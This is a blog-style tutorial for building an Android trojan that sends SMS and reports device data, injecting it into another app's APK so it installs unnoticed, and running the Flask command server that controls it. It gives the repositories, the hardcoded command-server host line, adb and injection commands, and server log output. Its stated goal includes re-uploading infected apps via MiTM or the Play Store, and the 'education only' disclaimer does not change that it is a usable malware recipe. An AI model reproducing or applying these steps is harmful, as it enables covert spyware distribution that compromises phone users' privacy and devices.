Notice : This post just For Education Purpose Only! the purpose: How to Infect and Inject trojan into APK File, and re-upload on your server or google play store using MiTM.
This project was to make a simple trojan app, to get information from the phone or to perform some remote action with the phone (send sms …). the second part was to inject this trojan into another app package (APK), so the trojan can be quietly install without the user noticing.
Dependencies; three repo are parts of this project :
– the trojan app, made with android studio : https://github.com/remijouannet/trojandroid_app
– the server part, to talk with the trojan : https://github.com/remijouannet/trojandroid_server
– the script to inject the trojan into an APK : https://github.com/remijouannet/trojandroid_mixapk
– get10 : https://github.com/remijouannet/get10
The first thing to do is to open the project with android studio :
git clone firstname.lastname@example.org:remijouannet/trojandroid_app.git
Try to build the app and launch it on your phone. this app don’t use any java library who isn’t include in the android SDK to avoid error when it will be inject in other app. The Trojan configuration is hardcode to avoid the dependence with any external XML.
So you’re gonna have to modify the code yourself if you want to test it. the only code to modify is in trojan.android.android_trojan.action, modify the following code in the class ConnectionServerThread
this.host = “pi.remijouannet.com”; //IP or domain name of the Trojan server
You can modify the “port” variable if you want, but it isn’t recommended, you can have some errors with a non standard port for https.
Run the app on your phone or on the emulator (MaJ+F10), the generate APK will be use later.
the app is pretty simple, it’s just an infinity loop in a background service who ask every 4000 seconds to the Trojan server if he had to do something, if he had he try to do it and send the result to the Trojan app, the service is relaunch every time the user unlock his phone.
So this is a python script who use the wonderful APKTOOL to inject the trojan into another APK.
the script unpack the two APK, copy and modify the smali code of the trojan into get10 package, a few modification in the manifest is of course necessary, after this get10 can be repack, install and use without any problem.
So you have to have the Trojan APK and an APK of another app (get10 for this example) (a little howto I find to extract an installed app of your phone)
# ./adb shell pm list packages | grep get10
# ./adb shell pm path com.remijouannet.get10
# ./adb pull /data/app/com.remijouannet.get10-1/base.apk && mv base.apk /tmp/
7544 KB/s (3117111 bytes in 0.403s)
# mixapk.py –apks /PathTotrojandroid_app/app/build/outputs/apk/app-debug.apk /tmp/base.apk
let’s do the magic. if you didn’t have any errors, you should find a file “app-final.pak” in your current directory.
if you have your phone in debug mode, you can push the apk to it with a simple adb command:
# adb install app-final.apk
the last component of the project, it’s a simple flask script who expose webservice to interact with the trojan.
the trojan launch a background service who’s gonna call the webservice continually to see if their is action to execute (send a sms, get the mac address …), if an order,is given to the trojan, the answer is send from the trojan to the server to an another webservice.
per default, the android trojan use https, so you have to use the script ssl.sh in the repo to generate private/public key, after that you can just launch a command to get information from the trojan.
example to get the mac adress:
sudo androidtrojan -s /home/pi/git/trojandroid_server/ssl/ --mac -v
* Running on https://192.168.1.36:443/ (Press CTRL+C to quit)
* Restarting with stat
192.168.1.50 - - [08/Jul/2015 19:38:44] "GET /action HTTP/1.1" 200 -
192.168.1.50 - - [08/Jul/2015 19:38:45] "POST /result HTTP/1.1" 200 -
Source : https://github.com/remijouannet